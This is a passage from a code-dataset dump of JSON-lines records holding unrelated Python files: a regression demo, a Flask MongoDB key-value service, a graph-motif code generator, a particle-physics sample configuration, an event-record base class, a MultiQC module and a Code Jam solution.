instance.profile.save()","sub_path":"django2opah/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"424201608","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nN = 50\nX = np.linspace(0, 10, N) # 50 evenly spaced points between 0 and 10\nY = 0.5 * X + np.random.randn(N)\n\n# manually make some outliers\nY[-1] += 30 # the last point is 30 bigger than it is\nY[-2] += 30\n\nplt.scatter(X, Y)\n\n## solve for the best way\n\n# add the bias term\nX = np.vstack([np.ones(N), X]).T\n\n## calculate the maximum likelihood solution\nw_ml = np.linalg.solve(X.T.dot(X), X.T.dot(Y))\nY_hat_ml = X.dot(w_ml)\nplt.scatter(X[:, 1], Y)\nplt.plot(X[:, 1], Y_hat_ml)\n\n## Calculate the L2 regularization solution\nl2 = 1000.0 # l2 penalty\nw_map = np.linalg.solve(l2 * np.eye(2) + X.T.dot(X), X.T.dot(Y))\nY_hat_map = X.dot(w_map)\nplt.scatter(X[:, 1], Y)\nplt.plot(X[:, 1], Y_hat_ml, label='maximum likelihood')\nplt.plot(X[:, 1], Y_hat_map, label='map')\nplt.legend()\n\n","sub_path":"LinReg/l2_regularization.py","file_name":"l2_regularization.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"216482274","text":"from flask import Flask,Request\nfrom flask import request\nfrom flask import jsonify\nfrom flask import make_response\nimport os\nimport pymongo\nfrom urlparse import urlparse\nimport datetime\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nHEADERS_TO_COPY = ['Content-Type']\n\n\nclass SimpleRequest(Request):\n want_form_data_parsed = False\n data = None\n\napp = Flask(__name__)\napp.request_class = SimpleRequest\n\nMONGO_URL = os.environ.get('MONGOHQ_URL')\n\nif MONGO_URL:\n conn = pymongo.MongoClient(MONGO_URL)\n db = conn[urlparse(MONGO_URL).path[1:]]\nelse:\n conn = pymongo.MongoClient('localhost', 27017)\n db = conn[__name__]\n\n@app.route('/', defaults={'path': ''}, methods=['GET'])\n@app.route('/', methods=['GET'])\ndef catch_all_get(path):\n\n doc = db.state.find_one({'_id': path})\n raw = request.args.get('raw', False)\n\n if raw:\n ret = (doc[u'data'], 200) if doc else (u'not found', 404)\n response = make_response(ret)\n\n for header_name, header_value in doc[u'headers'].items():\n if header_name in HEADERS_TO_COPY:\n response.headers[header_name] = header_value\n\n return response\n else:\n ret = (jsonify(doc), 200) if doc \\\n else (jsonify({u'_id': path, u'error': u'not found'}), 404)\n return ret\n\n@app.route('/', defaults={'path': ''}, methods=['POST'])\n@app.route('/', methods=['POST'])\ndef catch_all_post(path):\n\n doc = {u'_id': path,\n u'data': request.get_data(as_text=True),\n u'headers': dict(request.headers),\n u'time': str(datetime.datetime.utcnow().isoformat())}\n db.state.save(doc)\n return jsonify(doc)\n\n@app.route('/', defaults={'path': ''}, methods=['DELETE'])\n@app.route('/', methods=['DELETE'])\ndef catch_all_delete(path):\n db.state.remove({u'_id': path})\n return jsonify({u'_id': path, u'data': None})\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\nif __name__ == \"__main__\":\n app.run()","sub_path":"restbin.py","file_name":"restbin.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"118731512","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ScaDaMaLe Course [site](https://lamastex.github.io/scalable-data-science/sds/3/x/) and [book](https://lamastex.github.io/ScaDaMaLe/index.html)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # Intro\n# MAGIC \n# MAGIC In this notebook we create a code-writing program. Coding a specific motif generally makes for very long strings, the length grows as \\\\(n^2\\\\). Thus coding them directly is very inefficient. We solved this problem via a simple program. Here we can simply feed the adjacancy matrix of the motif we want to find, and it gives us the scala code.\n\n# COMMAND ----------\n\nimport numpy as np\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC In this funtion we input the adjacancy matrix of the motif we want to find. Then it produces the text of a scala command. Than command can then be copy-pasted into another notebook.\n# MAGIC \n# MAGIC Here we simply go through the adjacancy matrix and fix the string thereafter. In this function the motif we want to find is induced by the graph. Thus each edge is either wanted or forbidden. \n# MAGIC \n# MAGIC loops - Do we care about loops or not.\n\n# COMMAND ----------\n\n\ndef matrix_to_string(input_matrix, input_function_name, loops = True):\n ret_string = \"def \" + input_function_name + \"(input_graph: GraphFrame) = {\\n\\tval string_\" +input_function_name+ \" = \\\"\"\n filter_string = \"\"\n pos_edges = \"\"\n neg_edges = \"\"\n alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n \n for i in range(len(input_matrix)):\n for j in range(len(input_matrix[i])):\n if i == j:\n if loops and input_matrix[i][j] != 0:\n pos_edges += \"(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n elif loops:\n neg_edges += \"!(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n elif input_matrix[i][j] != 0:\n pos_edges += \"(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n else:\n neg_edges += \"!(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n if i > j:\n filter_string += \".filter(\\\"\" + alphabet[j] + \".id != \" + alphabet[i] + \".id\\\")\"\n ret_string += pos_edges + neg_edges\n ret_string = ret_string[0:-2]\n ret_string += \"\\\"\\n\\tinput_graph.find(g_1)\"\n ret_string += filter_string\n ret_string += \".count\\n}\\n\"\n return ret_string\n \n \n \n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC In this funtion we input the signed adjacancy matrix of the motif we want to find. Then it produces the text of a scala command. Than command can then be copy-pasted into another notebook.\n# MAGIC \n# MAGIC Here we simply go through the adjacancy matrix and fix the string thereafter. In this function each edge can either be demanded, forbidden, or allowed. 
The three states are represented by 1, -1, and all other values.\n# MAGIC \n# MAGIC loops - Do we care about loops or not.\n\n# COMMAND ----------\n\ndef matrix_to_string_signed(input_matrix, input_function_name):\n ret_string = \"def \" + input_function_name + \"(input_graph: GraphFrame) = {\\n\\tval string_\" +input_function_name+ \" = \\\"\"\n filter_string = \"\"\n pos_edges = \"\"\n neg_edges = \"\"\n alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n \n for i in range(len(input_matrix)):\n for j in range(len(input_matrix[i])):\n if input_matrix[i][j] == 1:\n pos_edges += \"(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n elif input_matrix[i][j] == -1:\n neg_edges += \"!(\" + alphabet[i] + \")-[]->(\" + alphabet[j] + \"); \"\n if i > j:\n filter_string += \".filter(\\\"\" + alphabet[j] + \".id != \" + alphabet[i] + \".id\\\")\"\n ret_string += pos_edges + neg_edges\n ret_string = ret_string[0:-2]\n ret_string += \"\\\"\\n\\tinput_graph.find(g_1)\"\n ret_string += filter_string\n ret_string += \".count\\n}\\n\"\n return ret_string\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC # Examples\n# MAGIC \n# MAGIC Here is a quick example where we have coded for a \"claw\". Another name for the claw is a star of size 3, meaning it has 4 vertices.\n\n# COMMAND ----------\n\nprint(matrix_to_string([[0,0,0,1],[0,0,0,1],[0,0,0,1],[0,0,0,0]], \"count_claw\", loops = False))\n\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Here we cave coded for a v-structure.\n\n# COMMAND ----------\n\nprint(matrix_to_string([[0,0,1],[0,0,1],[0,0,0]], \"count_v_struc\", loops = False))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Counting how many loops\n\n# COMMAND ----------\n\nprint(matrix_to_string([[1]], \"count_loop\"))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC A very important thing we want to look at is complete graphs. \n# MAGIC \n# MAGIC As these can grow big, we write a function to generate them.\n\n# COMMAND ----------\n\ndef adj_matrix_complete_graph(size):\n adj_matrix = np.zeros((size,size))\n for i in range(len(adj_matrix)):\n for j in range(i+1, len(adj_matrix[i])):\n adj_matrix[i][j] = 1\n return adj_matrix\n \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC Now we can generate the code of interest.\n\n# COMMAND ----------\n\nfor i in range(3,7+1):\n print(matrix_to_string_signed(adj_matrix_complete_graph(i), \"count_K\"+str(i)))\n\n# COMMAND ----------\n\n","sub_path":"dbcArchives/2021/000_0-sds-3-x-projects/student-project-07_group-MathAtKTH/03_graph_string_converter.py","file_name":"03_graph_string_converter.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"502333730","text":"# Description: Common configuration file for creating pico sample set plotting scripts\nimport re\nfrom TauFW.Plotter.sample.utils import LOG, STYLE, ensuredir, repkey, joincuts, setera, getyear, Sel, Var\nfrom TauFW.Plotter.sample.utils import getsampleset as _getsampleset\n\ndef getsampleset(channel,era,**kwargs):\n verbosity = LOG.getverbosity(kwargs)\n year = getyear(era) # get integer year\n split = kwargs.get('split', ['DY'] ) # split samples (e.g. DY) into genmatch components\n join = kwargs.get('join', ['VV','Top'] ) # join samples (e.g. VV, top)\n tag = kwargs.get('tag', \"\" )\n table = kwargs.get('table', True ) # print sample set table\n setera(era) # set era for plot style and lumi-xsec normalization\n \n # SM BACKGROUND MC SAMPLES\n if era=='2016':\n expsamples = [ # table of MC samples to be converted to Sample objects\n # GROUP NAME TITLE XSEC EXTRA OPTIONS\n ( 'DY', \"DYJetsToLL_M-10to50\", \"Drell-Yan 10-50\", 18610.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DYJetsToLL_M-50\", \"Drell-Yan 50\", 4963.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY1JetsToLL_M-50\", \"Drell-Yan 1J 50\", 1012.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY2JetsToLL_M-50\", \"Drell-Yan 2J 50\", 334.7, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY3JetsToLL_M-50\", \"Drell-Yan 3J 50\", 102.3, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY4JetsToLL_M-50\", \"Drell-Yan 4J 50\", 54.52, {'extraweight': 'zptweight'} ),\n ( 'WJ', \"WJetsToLNu\", \"W + jets\", 50260.0 ),\n ( 'WJ', \"W1JetsToLNu\", \"W + 1J\", 9625.0 ),\n ( 'WJ', \"W2JetsToLNu\", \"W + 2J\", 3161.0 ),\n ( 'WJ', \"W3JetsToLNu\", \"W + 3J\", 954.8 ),\n ( 'WJ', \"W4JetsToLNu\", \"W + 4J\", 494.6 ),\n ( 'VV', \"WW\", \"WW\", 75.88 ),\n ( 'VV', \"WZ\", \"WZ\", 27.6 ),\n ( 'VV', \"ZZ\", \"ZZ\", 12.14 ),\n ( 'ST', \"ST_t-channel_top\", \"ST t-channel t\", 136.02 ),\n ( 'ST', \"ST_t-channel_antitop\", \"ST t-channel at\", 80.95 ),\n ( 'ST', \"ST_tW_top\", \"ST tW\", 35.85 ),\n ( 'ST', \"ST_tW_antitop\", \"ST atW\", 35.85 ),\n ( 'TT', \"TT\", \"ttbar\", 831.76, {'extraweight': 'ttptweight'} ),\n ]\n elif era=='2017':\n expsamples = [ # table of MC samples to be converted to Sample objects\n # GROUP NAME TITLE XSEC EXTRA OPTIONS\n ( 'DY', \"DYJetsToLL_M-10to50\", \"Drell-Yan 10-50\", 18610.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DYJetsToLL_M-50\", \"Drell-Yan 50\", 5343.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY1JetsToLL_M-50\", \"Drell-Yan 1J 50\", 877.8, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY2JetsToLL_M-50\", \"Drell-Yan 2J 50\", 304.4, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY3JetsToLL_M-50\", \"Drell-Yan 3J 50\", 111.5, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY4JetsToLL_M-50\", \"Drell-Yan 4J 50\", 44.05, {'extraweight': 'zptweight'} ),\n ( 'WJ', \"WJetsToLNu\", \"W + jets\", 52940.0 ),\n ( 'WJ', \"W1JetsToLNu\", \"W + 1J\", 8104.0 ),\n ( 'WJ', \"W2JetsToLNu\", \"W + 2J\", 2793.0 ),\n ( 'WJ', \"W3JetsToLNu\", \"W + 3J\", 992.5 ),\n ( 'WJ', \"W4JetsToLNu\", \"W + 4J\", 544.3 ),\n ( 'VV', \"WW\", \"WW\", 75.88 ),\n ( 'VV', \"WZ\", \"WZ\", 27.6 ),\n ( 'VV', \"ZZ\", \"ZZ\", 12.14 ),\n ( 'ST', \"ST_t-channel_top\", \"ST t-channel t\", 136.02 ),\n ( 'ST', \"ST_t-channel_antitop\", \"ST t-channel at\", 80.95 ),\n ( 'ST', \"ST_tW_top\", \"ST tW\", 35.85 ),\n ( 'ST', \"ST_tW_antitop\", \"ST atW\", 35.85 ),\n ( 'TT', \"TTTo2L2Nu\", \"ttbar 2l2#nu\", 88.29, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToHadronic\", \"ttbar hadronic\", 377.96, {'extraweight': 'ttptweight'} ),\n ( 
'TT', \"TTToSemiLeptonic\", \"ttbar semileptonic\", 365.35, {'extraweight': 'ttptweight'} ),\n ]\n elif era=='UL2017':\n expsamples = [ # table of MC samples to be converted to Sample objects\n # GROUP NAME TITLE XSEC EXTRA OPTIONS\n #( 'DY', \"DYJetsToLL_M-10to50\", \"Drell-Yan 10-50\", 18610.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DYJetsToLL_M-50\", \"Drell-Yan 50\", 5343.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY1JetsToLL_M-50\", \"Drell-Yan 1J 50\", 877.8, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY2JetsToLL_M-50\", \"Drell-Yan 2J 50\", 304.4, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY3JetsToLL_M-50\", \"Drell-Yan 3J 50\", 111.5, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY4JetsToLL_M-50\", \"Drell-Yan 4J 50\", 44.05, {'extraweight': 'zptweight'} ),\n ( 'WJ', \"WJetsToLNu\", \"W + jets\", 52940.0 ),\n ( 'WJ', \"W1JetsToLNu\", \"W + 1J\", 8104.0 ),\n ( 'WJ', \"W2JetsToLNu\", \"W + 2J\", 2793.0 ),\n ( 'WJ', \"W3JetsToLNu\", \"W + 3J\", 992.5 ),\n ( 'WJ', \"W4JetsToLNu\", \"W + 4J\", 544.3 ),\n ( 'VV', \"WW\", \"WW\", 75.88 ),\n ( 'VV', \"WZ\", \"WZ\", 27.6 ),\n ( 'VV', \"ZZ\", \"ZZ\", 12.14 ),\n ( 'ST', \"ST_t-channel_top\", \"ST t-channel t\", 136.02 ),\n ( 'ST', \"ST_t-channel_antitop\", \"ST t-channel at\", 80.95 ),\n ( 'ST', \"ST_tW_top\", \"ST tW\", 35.85 ),\n ( 'ST', \"ST_tW_antitop\", \"ST atW\", 35.85 ),\n ( 'TT', \"TTTo2L2Nu\", \"ttbar 2l2#nu\", 88.29, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToHadronic\", \"ttbar hadronic\", 377.96, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToSemiLeptonic\", \"ttbar semileptonic\", 365.35, {'extraweight': 'ttptweight'} ),\n ]\n elif era=='2018':\n expsamples = [ # table of MC samples to be converted to Sample objects\n # GROUP NAME TITLE XSEC EXTRA OPTIONS\n ( 'DY', \"DYJetsToLL_M-10to50\", \"Drell-Yan 10-50\", 18610.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DYJetsToLL_M-50\", \"Drell-Yan 50\", 4963.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY1JetsToLL_M-50\", \"Drell-Yan 1J 50\", 1012.0, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY2JetsToLL_M-50\", \"Drell-Yan 2J 50\", 334.7, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY3JetsToLL_M-50\", \"Drell-Yan 3J 50\", 102.3, {'extraweight': 'zptweight'} ),\n ( 'DY', \"DY4JetsToLL_M-50\", \"Drell-Yan 4J 50\", 54.52, {'extraweight': 'zptweight'} ),\n ( 'WJ', \"WJetsToLNu\", \"W + jets\", 52940.0 ),\n ( 'WJ', \"W1JetsToLNu\", \"W + 1J\", 8104.0 ),\n ( 'WJ', \"W2JetsToLNu\", \"W + 2J\", 2793.0 ),\n ( 'WJ', \"W3JetsToLNu\", \"W + 3J\", 992.5 ),\n ( 'WJ', \"W4JetsToLNu\", \"W + 4J\", 544.3 ),\n ( 'VV', \"WW\", \"WW\", 75.88 ),\n ( 'VV', \"WZ\", \"WZ\", 27.6 ),\n ( 'VV', \"ZZ\", \"ZZ\", 12.14 ),\n ( 'ST', \"ST_t-channel_top\", \"ST t-channel t\", 136.02 ),\n ( 'ST', \"ST_t-channel_antitop\", \"ST t-channel at\", 80.95 ),\n ( 'ST', \"ST_tW_top\", \"ST tW\", 35.85 ),\n ( 'ST', \"ST_tW_antitop\", \"ST atW\", 35.85 ),\n ( 'TT', \"TTTo2L2Nu\", \"ttbar 2l2#nu\", 88.29, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToHadronic\", \"ttbar hadronic\", 377.96, {'extraweight': 'ttptweight'} ),\n ( 'TT', \"TTToSemiLeptonic\", \"ttbar semileptonic\", 365.35, {'extraweight': 'ttptweight'} ),\n ]\n else:\n LOG.throw(IOError,\"Did not recognize era %r!\"%(era))\n \n # OBSERVED DATA SAMPLES\n if 'tautau' in channel: dataset = \"Tau_Run%d?\"%year\n elif 'mutau' in channel: dataset = \"SingleMuon_Run%d?\"%year\n elif 'etau' in channel: dataset = \"EGamma_Run%d?\"%year if year==2018 else \"SingleElectron_Run%d?\"%year\n elif 'mumu' in channel: dataset = \"SingleMuon_Run%d?\"%year\n 
elif 'emu' in channel: dataset = \"SingleMuon_Run%d?\"%year\n elif 'ee' in channel: dataset = \"EGamma_Run%d?\"%year if year==2018 else \"SingleElectron_Run%d?\"%year\n else:\n LOG.throw(IOError,\"Did not recognize channel %r!\"%(channel))\n datasample = ('Data',dataset) # GROUP, NAME\n \n # SAMPLE SET\n weight = \"genweight*trigweight*puweight*idisoweight_1*idweight_2\"\n if era=='UL2017':\n weight = weight.replace(\"*idweight_2\",\"\")\n fname = \"$PICODIR/$SAMPLE_$CHANNEL$TAG.root\"\n kwargs.setdefault('weight',weight) # common weight for MC\n kwargs.setdefault('fname', fname) # default filename pattern\n sampleset = _getsampleset(datasample,expsamples,channel=channel,era=era,**kwargs)\n \n # JOIN\n # Note: titles are set via STYLE.sample_titles\n sampleset.stitch(\"W*Jets\", incl='WJ', name='WJ' ) # W + jets\n sampleset.stitch(\"DY*J*M-50\", incl='DYJ', name=\"DY_M50\" ) # Drell-Yan, M > 50 GeV\n #sampleset.stitch(\"DY*J*M-10to50\", incl='DYJ', name=\"DY_M10to50\" )\n sampleset.join('DY', name='DY' ) # Drell-Yan, M < 50 GeV + M > 50 GeV\n if 'VV' in join:\n sampleset.join('VV','WZ','WW','ZZ', name='VV' ) # Diboson\n if 'TT' in join and era!='year':\n sampleset.join('TT', name='TT' ) # ttbar\n if 'ST' in join:\n sampleset.join('ST', name='ST' ) # single top\n if 'Top' in join:\n sampleset.join('TT','ST', name='Top' ) # ttbar + single top\n \n # SPLIT\n # Note: titles are set via STYLE.sample_titles\n if split and channel.count('tau')==1:\n ZTT = STYLE.sample_titles.get('ZTT',\"Z -> %s\"%channel) # title\n if channel.count('tau')==1:\n ZTT = ZTT.replace(\"{l}\",\"{mu}\" if \"mu\" in channel else \"{e}\")\n GMR = \"genmatch_2==5\"\n GML = \"genmatch_2>0 && genmatch_2<5\"\n GMJ = \"genmatch_2==0\"\n GMF = \"genmatch_2<5\"\n elif channel.count('tau')==2:\n ZTT = ZTT.replace(\"{l}\",\"{h}\")\n GMR = \"genmatch_1==5 && genmatch_2==5\"\n GML = \"(genmatch_1<5 || genmatch_2<5) && genmatch_1>0 && genmatch_2>0\"\n GMJ = \"(genmatch_1==0 || genmatch_2==0)\"\n GMF = \"(genmatch_1<5 || genmatch_2<5)\"\n else:\n LOG.throw(IOError,\"Did not recognize channel %r!\"%(channel))\n if 'DY' in split:\n sampleset.split('DY',[('ZTT',ZTT,GMR),('ZL',GML),('ZJ',GMJ),])\n if 'DM' in split: # split DY by decay modes\n samples.split('DY', [('ZTT_DM0', ZTT+\", h^{#pm}\", GMR+\" && decayMode_2==0\"),\n ('ZTT_DM1', ZTT+\", h^{#pm}h^{0}\", GMR+\" && decayMode_2==1\"),\n ('ZTT_DM10',ZTT+\", h^{#pm}h^{#mp}h^{#pm}\", GMR+\" && decayMode_2==10\"),\n ('ZTT_DM11',ZTT+\", h^{#pm}h^{#mp}h^{#pm}h^{0}\",GMR+\" && decayMode_2==11\"),\n ('ZL',GML),('ZJ',GMJ),])\n if 'TT' in split:\n sampleset.split('TT',[('TTT',GMR),('TTJ',GMF),])\n \n if table:\n sampleset.printtable(merged=True,split=True)\n return sampleset\n \n","sub_path":"Plotter/config/samples.py","file_name":"samples.py","file_ext":"py","file_size_in_byte":11786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"183574941","text":"#!/usr/bin/env python\n# coding: utf-8\n# Copyright (c) Qotto, 2019\n\n\"\"\" BaseRecord\n\nAll event / command / result must be inherit form this base class.\n\nThis class contain some base attribute for more details read class docstring\n\"\"\"\n\nimport uuid\nfrom datetime import (datetime, timezone)\n\nfrom typing import Dict, Any\n\nfrom tonga.utils.gen_correlation_id import gen_correlation_id\n\n__all__ = [\n 'BaseRecord',\n]\n\n\nclass BaseRecord:\n \"\"\" BaseRecord Class, is root class of all events\n\n Attributes:\n schema_version (str): Includes the schema version of the record, it helps to keep applications compatible\n with older records in the system\n record_id (str): Should be a unique identifier for your record. It should follow the UUID_ format.\n There should be no duplicate values for this field in the entire system.\n partition_key (str): Should be a key determining to which partition your record will be assigned.\n Records with the same *partition_key* value are guaranteed to be written to\n the same partition. This field can, for instance, be derived from the aggregate ID.\n correlation_id (str): An identifier that should be propagated across every call through the entire system.\n The purpose of this identifier is to track the waterfall of actions triggered by a unique\n upstream event. This is mainly used for debugging purposes.\n context (Dict[str, Any]): Somewhat similar to *correlation_id* in its implementation, because it\n should propagate to all downstream records. At each step, *context* can be completed\n with additional data, relevant to actions that were taken.\n\n Context has two purposes:\n - It facilitates debugging, by giving more information explaining why the record\n was generated.\n - It also provides a mechanism to keep relevant state of the upstream\n application, that can react to records generated by downstream\n applications. This enables developers to build reactive systems\n that can send asynchronous commands and respond to the results as\n soon as they are available, without keeping an internal state. This\n is equivalent to **stateless stream processing**, which greatly\n simplifies application code by eliminating state management.\n\n .. _UUID:\n https://en.wikipedia.org/wiki/Universally_unique_identifier\n \"\"\"\n schema_version: str\n record_id: str\n partition_key: str\n date: datetime\n correlation_id: str\n context: Dict[str, Any]\n\n def __init__(self, record_id: str = None, schema_version: str = None, partition_key: str = None,\n correlation_id: str = None, date: datetime = None, context: Dict[str, Any] = None) -> None:\n \"\"\" BaseRecord constructor\n\n Args:\n record_id (str): Should be a unique identifier for your record. It should follow the UUID_ format.\n There should be no duplicate values for this field in the entire system.\n schema_version (str): Includes the schema version of the record, it helps to keep applications compatible\n with older records in the system\n partition_key (str): Should be a key determining to which partition your record will be assigned.\n Records with the same *partition_key* value are guaranteed to be written to\n the same partition. This field can, for instance, be derived from the aggregate ID.\n correlation_id (str): An identifier that should be propagated across every call through the entire system.\n The purpose of this identifier is to track the waterfall of actions triggered\n by a unique upstream event. 
This is mainly used for debugging purposes.\n date (datetime): Python datetime, when base_dict was call date was split into two variable,\n (*timestamp* UNIX timestamp in milliseconds, which is easy to read for machines)\n (*datetime* ISO-8601-encoded string, which is human readable, therefore useful for\n debugging purposes.)\n context (Dict[str, Any]): Somewhat similar to *correlation_id* in its implementation, because it\n should propagate to all downstream records. At each step, *context* can be\n completed with additional data, relevant to actions that were taken.\n\n Context has two purposes:\n - It facilitates debugging, by giving more information explaining why the record\n was generated.\n - It also provides a mechanism to keep relevant state of the upstream\n application, that can react to records generated by downstream\n applications. This enables developers to build reactive systems\n that can send asynchronous commands and respond to the results as\n soon as they are available, without keeping an internal state. This\n is equivalent to **stateless stream processing**, which greatly\n simplifies application code by eliminating state management.\n\n .. _UUID:\n https://en.wikipedia.org/wiki/Universally_unique_identifier\n \"\"\"\n if record_id is None:\n self.record_id = uuid.uuid4().hex\n else:\n self.record_id = record_id\n\n if partition_key is None:\n self.partition_key = '0'\n else:\n self.partition_key = partition_key\n\n if schema_version is None:\n self.schema_version = '0.0.0'\n else:\n self.schema_version = schema_version\n\n if correlation_id is None:\n self.correlation_id = gen_correlation_id()\n else:\n self.correlation_id = correlation_id\n\n if date is None:\n self.date = datetime.now(timezone.utc)\n else:\n self.date = date\n\n if context is None:\n self.context = dict()\n else:\n self.context = context\n\n def base_dict(self) -> Dict[str, Any]:\n \"\"\" Return base dict.\n\n Returns:\n Dict[str, Any]: Base dict contains (record_id, schema_version, partition_key, datetime,\n timestamp, correlation_id, context)\n \"\"\"\n return {\n 'record_id': self.record_id,\n 'schema_version': self.schema_version,\n 'partition_key': self.partition_key,\n 'datetime': self.date.isoformat(),\n 'timestamp': self.date.timestamp() * 1000,\n 'correlation_id': self.correlation_id,\n 'context': self.context\n }\n\n @classmethod\n def event_name(cls) -> str:\n \"\"\" Return BaseRecord Class name, used by serializer\n\n Raises:\n NotImplementedError: Abstract def\n\n Returns:\n None\n \"\"\"\n raise NotImplementedError\n\n def to_dict(self) -> Dict[str, Any]:\n \"\"\" Serialize BaseRecord to dict\n\n Raises:\n NotImplementedError: Abstract def\n\n Returns:\n Dict[str, Any]: class in dict format\n \"\"\"\n raise NotImplementedError\n\n @classmethod\n def from_dict(cls, dict_data: Dict[str, Any]):\n \"\"\" Deserialize dict to BaseRecord\n\n Args:\n dict_data (Dict|str, Any]): Contains all BaseRecord Class attribute for return an instanced class\n\n Raises:\n NotImplementedError: Abstract def\n\n Returns:\n None\n \"\"\"\n raise NotImplementedError\n","sub_path":"tonga/models/records/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"318672497","text":"from multiqc.modules.base_module import BaseMultiqcModule\nimport json\n\nclass MultiqcModule(BaseMultiqcModule):\n def __init__(self):\n # Initialise the parent object\n super(MultiqcModule, self).__init__(name='Differential Gene Expression', anchor='dge_module',\n href=\"\",\n info=\"\")\n self.mod_data = dict()\n ###example of finding files specified in the search_patterns.yaml file\n for f in self.find_log_files('differential_expression/json'): \n path_file = f['fn']\n\n path_json = None\n with open(path_file,\"r\") as pf:\n path_json = json.load(pf) \n \n if path_json:\n img_list = []\n heatmap_file = path_json[\"heatmap\"]\n volcano_file = path_json[\"volcano\"]\n with open(heatmap_file,\"r\" )as h:\n img_list.append(h.read())\n with open(volcano_file,\"r\") as r:\n img_list.append(r.read())\n img_html = \"\\n\".join(img_list)\n self.add_section(content=img_html)\n\n ###add section text content\n self.add_section(\n content = '
Insert report section
'\n )\n\n\n","sub_path":"Multiqc/modules/differential_expression/differential_expression.py","file_name":"differential_expression.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"508229977","text":"import sys\r\nimport time\r\nstart_time = time.time()\r\nsys.stdin = open(\"input.txt\", \"r\")\r\n# sys.stdout = open(\"output.txt\", \"w\")\r\n\r\n# import random\r\n# for i in range(100):\r\n# print(random.randint(10**5,10**6))\r\n\r\ndef last_minus(arr):\r\n ans = -1\r\n for i in range(len(arr)):\r\n if arr[i] == '-':\r\n ans = i\r\n return ans\r\n\r\ndef flip(arr, index):\r\n for i in range(index + 1):\r\n if arr[i] == '-':\r\n arr[i] = '+'\r\n else:\r\n arr[i] = '-'\r\n return arr\r\n\r\n\r\nsys.stdout = open(\"output.txt\", \"w\")\r\nsys.stdout = sys.__stdout__\r\nfor testcases in range(int(input())):\r\n pancakes = input()\r\n arr = []\r\n for i in pancakes:\r\n arr.append(i)\r\n ans = 0\r\n while True:\r\n res = last_minus(arr)\r\n if res == -1:\r\n break\r\n ans += 1\r\n arr = flip(arr, res)\r\n\r\n sys.stdout = open(\"output.txt\", \"a\")\r\n print(\"Case #\" + str(testcases + 1) + \": \" + str(ans) )\r\n sys.stdout = sys.__stdout__\r\n print(\"Case #\" + str(testcases + 1) + \": Done\")\r\n\r\nsys.stdout = sys.__stdout__\r\nprint(time.time() - start_time)","sub_path":"codes/CodeJamCrawler/CJ/16_0_2_AgeOfEmpires2_main.py","file_name":"16_0_2_AgeOfEmpires2_main.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
